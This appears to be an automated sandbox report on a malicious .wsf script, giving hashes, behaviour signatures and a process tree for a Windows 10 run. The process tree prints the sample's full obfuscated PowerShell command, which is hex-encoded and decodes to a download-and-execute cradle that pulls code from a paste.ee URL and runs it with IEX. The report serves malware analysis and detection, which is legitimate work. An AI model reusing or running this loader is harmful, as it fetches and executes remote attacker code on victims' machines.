Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-09-2024 01:27

General

  • Target

    31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad.wsf

  • Size

    3KB

  • MD5

    a1373c64ddc49fd6affb0438cfc8221f

  • SHA1

    d3ae82986edcbb76a81bfe8db65ed41a59624ec1

  • SHA256

    31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad

  • SHA512

    e67352eba46223b8497bb4e1d029c8c06542b8491dde978ca10b009529e7fa37298e8c5bcf6e02769f2dd7857df61c404a51c9f8e06c99e8e24c53c418c97b48

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31b128f2442aa4c58503cb299f8ecf391119a3104aef762537061182c95537ad.wsf"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = ((24, 52,'3d',27, 49, 65 , 58 ,28, '4e' ,65, 27 ,'3b' , 24, 52,45 ,20 , '3d' , 20 ,24,52 ,'2b',27,57 , '2d','4f' , 42 , '4a', 27 , '3b' , 24 , 52, 45,44 , 20 , '3d',20, 24 , 52, 45 ,'2b' , 27, 65 , 43 ,54 , 20,'4e',65 ,54 , '2e' ,57, 27 ,'3b',24 ,50, 41,43,'3d',27, 65 , 42,43, '4c' , 27 , '3b', 24 ,78 ,78, 20,'3d' ,20,24, 50,41,43,'2b', 27, 49, 65, '4e' , 27, '3b',24, 52, '4f',20, '3d' ,20 ,24,78, 78, '2b' , 27 ,54 , 29 ,'2e',44 ,'4f', 57, '4e' , '4c' ,'4f' ,27,'3b' ,24 , '7a','7a' , '3d' , 27 , '4f',40,30,28,26,28 , 27 , 27 ,68 , 74,74, 70 ,73,'3a','2f','2f',70, 61,73,74, 65, '2e' ,65, 65 , '2f' , 72 ,'2f', 74 ,75,47 , 33 , 72 ,'2f' , 30 ,27, 27,29 ,27,'2e',52,65 , 50, '4c' , 41 , 43 ,65,28 , 27 ,'4f',40 , 30 , 28, 26,27, '2c' , 27 ,41,44,53,54, 52 ,49 , '4e',47 ,27,29 ,'3b' ,69,65 , 78, 28 , 24, 52 , 45 , 44,'2b' , 24, 52,'4f' ,'2b',24, '7a','7a', 29 ) | % { ( [cHar]([CONVeRT]::TOint16(( [strinG]$_ ) ,16))) })-jOIN'' |&( $env:cOmspeC[4,15,25]-jOIN'') ; powershell $ReDrO"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3068

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_grorrs05.2pp.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3068-24-0x00000242E4EE0000-0x00000242E4F24000-memory.dmp

    Filesize

    272KB

  • memory/3068-25-0x00000242E4FB0000-0x00000242E5026000-memory.dmp

    Filesize

    472KB

  • memory/4452-0-0x00007FFAAD1A3000-0x00007FFAAD1A5000-memory.dmp

    Filesize

    8KB

  • memory/4452-2-0x0000020A256C0000-0x0000020A256E2000-memory.dmp

    Filesize

    136KB

  • memory/4452-11-0x00007FFAAD1A0000-0x00007FFAADC61000-memory.dmp

    Filesize

    10.8MB

  • memory/4452-12-0x00007FFAAD1A0000-0x00007FFAADC61000-memory.dmp

    Filesize

    10.8MB

  • memory/4452-13-0x00007FFAAD1A0000-0x00007FFAADC61000-memory.dmp

    Filesize

    10.8MB

  • memory/4452-14-0x00007FFAAD1A0000-0x00007FFAADC61000-memory.dmp

    Filesize

    10.8MB

  • memory/4452-26-0x00007FFAAD1A3000-0x00007FFAAD1A5000-memory.dmp

    Filesize

    8KB

  • memory/4452-27-0x00007FFAAD1A0000-0x00007FFAADC61000-memory.dmp

    Filesize

    10.8MB

  • memory/4452-28-0x00007FFAAD1A0000-0x00007FFAADC61000-memory.dmp

    Filesize

    10.8MB